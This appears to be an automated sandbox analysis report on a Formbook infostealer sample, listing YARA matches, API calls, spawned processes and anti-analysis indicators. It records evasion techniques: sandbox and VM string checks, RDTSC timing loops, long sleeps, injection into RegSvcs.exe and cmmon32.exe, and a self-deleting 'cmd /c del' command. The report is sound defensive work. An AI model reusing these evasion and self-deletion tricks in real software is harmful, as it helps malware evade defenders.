Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19B00 NtSetValueKey,	5_2_04A19B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1A710 NtOpenProcessToken,	5_2_04A1A710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19760 NtOpenProcess,	5_2_04A19760
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A19770 NtSetInformationFile,	5_2_04A19770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A1A770 NtOpenThread,	5_2_04A1A770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_007881C0 NtCreateFile,	5_2_007881C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_00788270 NtReadFile,	5_2_00788270
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_007882F0 NtClose,	5_2_007882F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_007883A0 NtAllocateVirtualMemory,	5_2_007883A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078839A NtAllocateVirtualMemory,	5_2_0078839A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00401174	1_2_00401174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041C124	1_2_0041C124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00408C60	1_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B5D3	1_2_0041B5D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041C781	1_2_0041C781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EF900	1_2_019EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FB090	1_2_019FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1002	1_2_01AA1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1EBB0	1_2_01A1EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12581	1_2_01A12581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FD5E0	1_2_019FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E0D20	1_2_019E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB1D55	1_2_01AB1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F841F	1_2_019F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A06E30	1_2_01A06E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EB090	5_2_049EB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E841F	5_2_049E841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91002	5_2_04A91002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02581	5_2_04A02581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049ED5E0	5_2_049ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DF900	5_2_049DF900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D0D20	5_2_049D0D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F4120	5_2_049F4120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA1D55	5_2_04AA1D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F6E30	5_2_049F6E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0EBB0	5_2_04A0EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_00778C60	5_2_00778C60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_00772D90	5_2_00772D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_00772FB0	5_2_00772FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078C781	5_2_0078C781

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019EB150 appears 32 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 049DB150 appears 32 times

Source: 9JzK89dRiaBYTuN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9JzK89dRiaBYTuN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9JzK89dRiaBYTuN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.348423668.0000000005910000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStoreElement.dllB vs 9JzK89dRiaBYTuN.exe
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameConfigNodeType.dll> vs 9JzK89dRiaBYTuN.exe
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341147466.00000000002EC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameObjectEqualityCompar.exe< vs 9JzK89dRiaBYTuN.exe
Source: 9JzK89dRiaBYTuN.exe	Binary or memory string: OriginalFilenameObjectEqualityCompar.exe< vs 9JzK89dRiaBYTuN.exe

Source: 9JzK89dRiaBYTuN.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: 9JzK89dRiaBYTuN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@14/7

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9JzK89dRiaBYTuN.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Mutant created: \Sessions\1\BaseNamedObjects\pyRNWsNXUbLJCwrhNfoT

Source: 9JzK89dRiaBYTuN.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 9JzK89dRiaBYTuN.exe	Virustotal: Detection: 57%
Source: 9JzK89dRiaBYTuN.exe	ReversingLabs: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe'
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9JzK89dRiaBYTuN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9JzK89dRiaBYTuN.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 9JzK89dRiaBYTuN.exe

Static file information: File size 1263616 > 1048576

Source: 9JzK89dRiaBYTuN.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x126c00

Source: 9JzK89dRiaBYTuN.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmmon32.pdb source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
Source:	Binary string: RegSvcs.pdb source: cmmon32.exe, 00000005.00000002.604383897.0000000002DF4000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Code function: 0_2_0241E8E0 push eax; ret	0_2_0241E8F9
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Code function: 0_2_0241D374 pushfd ; ret	0_2_0241E9D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B3B5 push eax; ret	1_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B46C push eax; ret	1_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B402 push eax; ret	1_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B40B push eax; ret	1_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041CE07 pushfd ; ret	1_2_0041CE08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A3D0D1 push ecx; ret	1_2_01A3D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A2D0D1 push ecx; ret	5_2_04A2D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078BBDB push edi; retf	5_2_0078BBDC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078B3B5 push eax; ret	5_2_0078B408
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078B46C push eax; ret	5_2_0078B472
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078B40B push eax; ret	5_2_0078B472
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078B402 push eax; ret	5_2_0078B408
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_0078CE07 pushfd ; ret	5_2_0078CE08

Source: initial sample

Static PE information: section name: .text entropy: 7.81629816462

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.9JzK89dRiaBYTuN.exe.258d828.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JzK89dRiaBYTuN.exe PID: 6048, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 00000000007785E4 second address: 00000000007785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 000000000077897E second address: 0000000000778984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe TID: 6040	Thread sleep time: -39792s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe TID: 2916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4968	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2200	Thread sleep time: -44000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Thread delayed: delay time: 39792			Jump to behavior
Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000002.00000000.363289775.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.363174585.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: cmmon32.exe, 00000005.00000002.605137350.0000000002E50000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW##
Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.356977430.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: vmware
